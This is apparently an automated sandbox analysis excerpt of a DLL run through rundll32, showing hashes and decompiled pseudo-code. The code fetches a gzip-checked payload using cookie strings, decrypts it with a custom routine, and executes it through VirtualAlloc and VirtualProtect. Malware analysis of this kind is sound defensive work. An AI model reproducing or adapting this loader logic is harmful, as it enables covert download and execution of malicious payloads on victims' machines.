      • String ID: c:\ProgramData\
      • API String ID: 1583731639-4167965204
      • Opcode ID: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
      • Instruction ID: 6a04e3bab3544b7625e32e0bbe63c8079b4262e858a91f78b1d04aa0cec903dd
      • Opcode Fuzzy Hash: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
      • Instruction Fuzzy Hash: 4B211A72214A8A96EB51CF11E8447CE7364F788BC8F959022EA5E57668DF38C60ECB44
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: wsprintf
      • String ID: %s%u$; _ga=
      • API String ID: 2111968516-3272795577
      • Opcode ID: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
      • Instruction ID: 8dfdff9f2ba73ed5fda4775318dfd5996efea46270aa07bd7b9716fa6782b752
      • Opcode Fuzzy Hash: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
      • Instruction Fuzzy Hash: 80119672704A4A92DA62CF14F5547E97320FB5C789F848226EA4D27A76DE3CC62EC740
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 42%
      			E00000001180001D80(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, intOrPtr* __r8, long long* __r9, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
      				void* _v8;
      				char _v136;
      				void* __rdi;
      				void* _t12;
      				char* _t37;
      				intOrPtr* _t51;
      				void* _t66;
      
      				_t66 = __r11;
      				_a8 = __rbx;
      				_a16 = __rbp;
      				_a24 = __rsi;
      				_t51 = __r8;
      				wsprintfW(??, ??);
      				_t12 = E00000001180001B08(__rbx,  &_v136, __rdx, __rdx, __r8, __r9);
      				_t37 =  *_t51;
      				if (_t12 == 0x194) goto 0x80001e2e;
      				if (_t12 != 0xc8) goto 0x80001e01;
      				if (_t37 == 0) goto 0x80001e1a;
      				if ( *__r9 - 0x400 < 0) goto 0x80001e01;
      				if ( *_t37 != 0x1f) goto 0x80001e01;
      				if ( *((char*)(_t37 + 1)) != 0x8b) goto 0x80001e01;
      				if (E00000001180001760(_t37, _t51, __r9, __r9, _t51, _t66, __r14) != 0) goto 0x80001e27;
      				if (_t37 == 0) goto 0x80001e1a;
      				GetProcessHeap();
      				HeapFree(??, ??, ??);
      				Sleep(??);
      				goto 0x80001db5;
      				goto 0x80001e49;
      				if (_t37 == 0) goto 0x80001e47;
      				GetProcessHeap();
      				HeapFree(??, ??, ??);
      				return 0;
      			}

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$FreeProcess$Sleepwsprintf
      • String ID:
      • API String ID: 2048420019-0
      • Opcode ID: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
      • Instruction ID: a2cd984f53a93593caa01796726c62d074961a460daaaee6897d674b1d8fdaee
      • Opcode Fuzzy Hash: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
      • Instruction Fuzzy Hash: 06213872604BC8CAFBA2DB22E4043D97295AB5DBC2F48C131EF495B795DF38C6498341
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 37%
      			E00000001180001B5C(void* __edi, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
      				void* _t8;
      				void* _t11;
      				void* _t15;
      				void* _t32;
      
      				_a8 = __rbx;
      				_a16 = __rsi;
      				GetProcessHeap();
      				r8d = 0x2001;
      				_t8 = HeapAlloc(??, ??, ??);
      				if (__rax == 0) goto 0x80001bc2;
      				E000000011800014B4(_t8, _t15, __rax, __rax, L"Cookie: _s=", __rcx, _t32, __rcx);
      				r9d = _t11;
      				return wsprintfW(??, ??);
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$AllocFreewsprintf
      • String ID: %s%u$Cookie: _s=
      • API String ID: 4121094037-887366058
      • Opcode ID: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
      • Instruction ID: 843dd351c34123922bb2a738a6afe93933f5c472e56c7fab694ad2d1448e7ea3
      • Opcode Fuzzy Hash: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
      • Instruction Fuzzy Hash: 65F03772700B8981EA92CB0AF4443D93660F78CBC0F489124EE4E1B76ADE3CC64AC340
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 41%
      			E00000001180002B5C(void* __ebx, signed int __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* _a8, long long _a16, long long _a24, long long _a32) {
      				void* __rdi;
      				signed int _t43;
      				intOrPtr _t55;
      				void* _t57;
      				void* _t62;
      				signed long long _t64;
      				void* _t67;
      				void* _t69;
      				signed long long _t70;
      				void* _t79;
      				signed int _t81;
      				void* _t84;
      				intOrPtr* _t90;
      
      				_t69 = __rcx;
      				_t64 = __rax;
      				_a16 = __rbx;
      				_a24 = __rbp;
      				_a32 = __rsi;
      				_t84 = __rdx;
      				_t67 = __rcx;
      				r8d = 0x3000;
      				_t5 = _t69 + 4; // 0x4
      				r9d = _t5;
      				VirtualAlloc(??, ??, ??, ??);
      				_t81 = __rax;
      				if (__rax != 0) goto 0x80002baa;
      				GetLastError();
      				goto 0x80002c72;
      				_t55 =  *((intOrPtr*)(__rcx + 0x1c));
      				if (_t55 <= 0) goto 0x80002bf1;
      				_t70 = __rax * 0x11;
      				r8d =  *(_t70 + __rcx + 0x28);
      				r10d =  *((intOrPtr*)(_t70 + __rcx + 0x20));
      				_t90 = __r8 + __rcx;
      				r9d =  *((intOrPtr*)(_t70 + __rcx + 0x2c));
      				if (_t55 == 0) goto 0x80002bea;
      				if (_t90 == 0) goto 0x80002bea;
      				_t57 = __r9;
      				if (_t57 == 0) goto 0x80002bea;
      				 *((char*)(__r10 + __rax)) =  *_t90;
      				if (_t57 != 0) goto 0x80002bd8;
      				if (1 -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x80002bb1;
      				if (E00000001180001A3C(__ebx, 0, 1 -  *((intOrPtr*)(__rcx + 0x1c)), __rcx, __rax, __rcx, _t79, __rax) != 0) goto 0x80002c07;
      				goto 0x80002c72;
      				if (E00000001180001E64(0, __rcx, _t81, __rcx, _t79, _t81, _t84) != 0) goto 0x80002c28;
      				GetLastError();
      				goto 0x80002c72;
      				if ( *((intOrPtr*)(_t67 + 0x1c)) <= 0) goto 0x80002c56;
      				r8d =  *(_t64 * 0x11 + _t67 + 0x30) & 0x000000ff;
      				VirtualProtect(??, ??, ??, ??);
      				_t62 = 1 -  *((intOrPtr*)(_t67 + 0x1c));
      				if (_t62 < 0) goto 0x80002c2d;
      				if (_t62 == 0) goto 0x80002c72;
      				 *((long long*)(_t64 + _t81))();
      				_t43 = GetLastError();
      				asm("bts eax, 0x1b");
      				return _t43 & 0x00ffffff;
      			}

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: AllocErrorLastVirtual
      • String ID:
      • API String ID: 497505419-0
      • Opcode ID: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
      • Instruction ID: ea269a028a1356371e25c0c3e3ed4ebc626b70e9dbdbba68532a1a5be3ab6bd4
      • Opcode Fuzzy Hash: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
      • Instruction Fuzzy Hash: C831047270464886F697DF19A8007EC7760F74DBD4F28C224FE4A47799CE28CA4B8B00
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 30%
      			E000000011800014B4(void* __eax, void* __ebp, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
      				signed int _t19;
      				unsigned long long _t42;
      				signed long long _t46;
      				void* _t50;
      				intOrPtr* _t55;
      				void* _t59;
      				char* _t67;
      
      				_a8 = __rbx;
      				_a16 = __rbp;
      				_a24 = __rsi;
      				_t19 =  *__rdx & 0x0000ffff;
      				_t59 = __rcx;
      				if (_t19 == 0) goto 0x800014f1;
      				 *(__rcx - __rdx + __rdx) = _t19;
      				_t46 = __rbx + 1;
      				if ((__rdx[1] & 0x0000ffff) != 0) goto 0x800014dd;
      				_t50 = __r8;
      				E00000001180001604(_t42, _t46, __r8, __rcx);
      				_t55 =  !=  ? _t42 : "error";
      				if ( *_t55 == 0) goto 0x80001543;
      				_t67 = "0123456789ABCDEF";
      				 *((short*)(_t59 + _t46 * 2)) =  *((char*)((_t42 >> 4) + _t67));
      				 *((short*)(_t59 + 2 + _t46 * 2)) =  *((char*)(_t50 + _t67));
      				if ( *((intOrPtr*)(_t55 + 1)) != 0) goto 0x80001517;
      				 *((short*)(_t59 + (_t46 + 2) * 2)) = 0;
      				if (_t42 == 0) goto 0x80001560;
      				GetProcessHeap();
      				return HeapFree(??, ??, ??);
      			}
      0x1800014b4
      0x1800014b9
      0x1800014be
      0x1800014c8
      0x1800014cd
      0x1800014d5
      0x1800014dd
      0x1800014e2
      0x1800014ef
      0x1800014f1
      0x1800014f4
      0x180001506
      0x18000150e
      0x180001510
      0x18000152b
      0x180001534
      0x180001541
      0x180001543
      0x18000154a
      0x18000154c
      0x180001577

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$FreeProcess
      • String ID: 0123456789ABCDEF$error
      • API String ID: 3859560861-2801526254
      • Opcode ID: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
      • Instruction ID: 4d37b50957ecb40c11f1bab49c43fdea11f128f3efa604fbc2492665c83ce860
      • Opcode Fuzzy Hash: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
      • Instruction Fuzzy Hash: 1011B1A6600BC8C5EB92DF51A8103EA77B0EB4CBC5F489165FBC947765EE2CC659C300
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocByteCharMultiProcessWidelstrlen
      • String ID:
      • API String ID: 1639946962-0
      • Opcode ID: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
      • Instruction ID: f749ba44300ed36f526ff8a462cf25b5487c4517239f32e4156c9a8f9373c5fc
      • Opcode Fuzzy Hash: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
      • Instruction Fuzzy Hash: A101A772505B8982E791CF11F80439AB7A1F78CBD4F088224EB5917798DF3CC6088744
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$AllocFree
      • String ID:
      • API String ID: 756756679-0
      • Opcode ID: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
      • Instruction ID: 9806a40fc76e7d2c0d57f827516f40d69531b25457ee03bdfc89f6e60ed63076
      • Opcode Fuzzy Hash: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
      • Instruction Fuzzy Hash: 99518B72A00B548AEB56CF21E5007DC77B1F70CBE9F088215EE6927B88DF34D6468310
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 27%
      			E00000001180002268(void* __edx, long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r11, long long __r14) {
      				char _v872;
      				signed int _v904;
      				signed int _v912;
      				long long _v920;
      				long long _v928;
      				long long _v936;
      				void* __rbp;
      				void* _t100;
      				long long _t103;
      				intOrPtr _t108;
      				void* _t111;
      				signed long long _t114;
      				long long _t117;
      				long long _t118;
      				signed int _t119;
      				signed long long _t120;
      				long long _t123;
      				intOrPtr _t124;
      				void* _t127;
      				void* _t130;
      				void* _t131;
      				signed long long _t134;
      
      				_t114 = __rdx;
      				_t100 = _t130;
      				 *((long long*)(_t100 + 8)) = __rbx;
      				 *((long long*)(_t100 + 0x10)) = __rsi;
      				 *((long long*)(_t100 + 0x18)) = __rdi;
      				 *((long long*)(_t100 + 0x20)) = __r14;
      				_t131 = _t130 - 0x3c0;
      				r14d =  *((intOrPtr*)(__rcx + 2));
      				_t123 = __rcx + 0x2c6;
      				E00000001180001F2C(__rbx, __rcx, __rdx, __rdi, _t123, _t100 - 0x2c8, __r8,  &_v872);
      				_v912 = _v912 & 0x00000000;
      				_t117 = __r14 - 0x10;
      				_t111 = _t117 + _t123;
      				_v936 = _t123;
      				_v920 = _t117;
      				_v928 = _t123;
      				if (_t111 == 0) goto 0x800022e4;
      				asm("movups xmm0, [ecx]");
      				_t103 = _t111 - __r14 - _t123;
      				asm("movups [esp+eax+0x50], xmm0");
      				_t118 = _v920;
      				_t124 = _v936;
      				r10d = 0;
      				if (_t124 == 0) goto 0x800023f3;
      				if (_t118 - 4 < 0) goto 0x800023f3;
      				_t119 = _t118 + 0xfffffffc;
      				_v920 = _t119;
      				if (_v928 != 0) goto 0x8000233e;
      				if (_t119 == 0) goto 0x800023f3;
      				GetProcessHeap();
      				_t134 = _t119 + 1;
      				HeapAlloc(_t127, ??);
      				_v928 = _t103;
      				if (_t103 == 0) goto 0x800023f3;
      				r10d = 1;
      				r9d =  *(_t119 + _t124);
      				r11d = 0;
      				r9d = r9d ^ _v904;
      				_v912 = _t119;
      				if (_t119 == 0) goto 0x800023b6;
      				r8d = _t114 + 1;
      				r8d = r8d & 0x00000003;
      				 *(__r11 + _t103) =  *((intOrPtr*)(_t131 + 0x40 + _t134 * 4)) +  *((intOrPtr*)(_t131 + 0x40 + _t114 * 4)) ^  *(__r11 + _t124);
      				asm("ror eax, cl");
      				 *((intOrPtr*)(_t131 + 0x40 + _t114 * 4)) =  *((intOrPtr*)(_t131 + 0x40 + _t114 * 4)) + 1;
      				asm("ror eax, cl");
      				 *((intOrPtr*)(_t131 + 0x40 + _t134 * 4)) =  *((intOrPtr*)(_t131 + 0x40 + _t134 * 4)) + 1;
      				_t108 = _v928;
      				if (__r11 + 1 - _v920 >= 0) goto 0x800023b1;
      				goto 0x80002354;
      				_t120 = _v912;
      				if (_t120 == 0) goto 0x800023d0;
      				asm("rol ecx, 0x3");
      				if (_t114 + 1 - _t120 < 0) goto 0x800023bf;
      				if (r9d == 0 + ( *(_t114 + _t108) & 0x000000ff)) goto 0x80002415;
      				if (r10d == 0) goto 0x800023f3;
      				if (_t108 == 0) goto 0x800023f3;
      				GetProcessHeap();
      				HeapFree(??, ??, ??);
      				return 0x4000000;
      			}
      0x180002268
      0x180002268
      0x18000226b
      0x18000226f
      0x180002273
      0x180002277
      0x180002283
      0x18000228a
      0x180002293
      0x18000229a
      0x18000229f
      0x1800022a5
      0x1800022a9
      0x1800022ad
      0x1800022b2
      0x1800022ba
      0x1800022c2
      0x1800022c4
      0x1800022cd
      0x1800022d0
      0x1800022d5
      0x1800022df
      0x1800022e4
      0x1800022ea
      0x1800022f4
      0x1800022fa
      0x1800022fe
      0x180002306
      0x18000230b
      0x180002311
      0x18000231a
      0x180002321
      0x180002327
      0x180002332
      0x180002338
      0x18000233e
      0x180002342
      0x180002345
      0x18000234a
      0x180002352
      0x180002358
      0x18000235f
      0x180002375
      0x180002383
      0x180002387
      0x180002395
      0x180002399
      0x18000239e
      0x1800023a8
      0x1800023af
      0x1800023b1
      0x1800023bd
      0x1800023c8
      0x1800023ce
      0x1800023d3
      0x1800023d8
      0x1800023dd
      0x1800023df
      0x1800023ed
      0x180002414

      APIs
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
        • Part of subcall function 0000000180001F2C: SHGetFolderPathA.SHELL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F79
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F8D
        • Part of subcall function 0000000180001F2C: lstrcatA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FA8
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FD4
        • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FEE
      • GetProcessHeap.KERNEL32 ref: 0000000180002311
      • HeapAlloc.KERNEL32 ref: 0000000180002321
      • GetProcessHeap.KERNEL32 ref: 00000001800023DF
      • HeapFree.KERNEL32 ref: 00000001800023ED
        • Part of subcall function 0000000180002B5C: VirtualAlloc.KERNEL32 ref: 0000000180002B85
        • Part of subcall function 0000000180002B5C: GetLastError.KERNEL32 ref: 0000000180002B95
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heaplstrcpy$AllocProcess$ErrorFolderFreeLastPathVirtuallstrcat
      • String ID:
      • API String ID: 2105669568-0
      • Opcode ID: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
      • Instruction ID: 886363a85c85b8c133f3364473ad3588f921292bdc20cd3c907036740f45d7b5
      • Opcode Fuzzy Hash: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
      • Instruction Fuzzy Hash: 3351D172614B8486EA96CF14E10479DB3A1F78CBC4F188221EB9957B88DF39D74AC700
      Uniqueness

      Uniqueness Score: -1.00%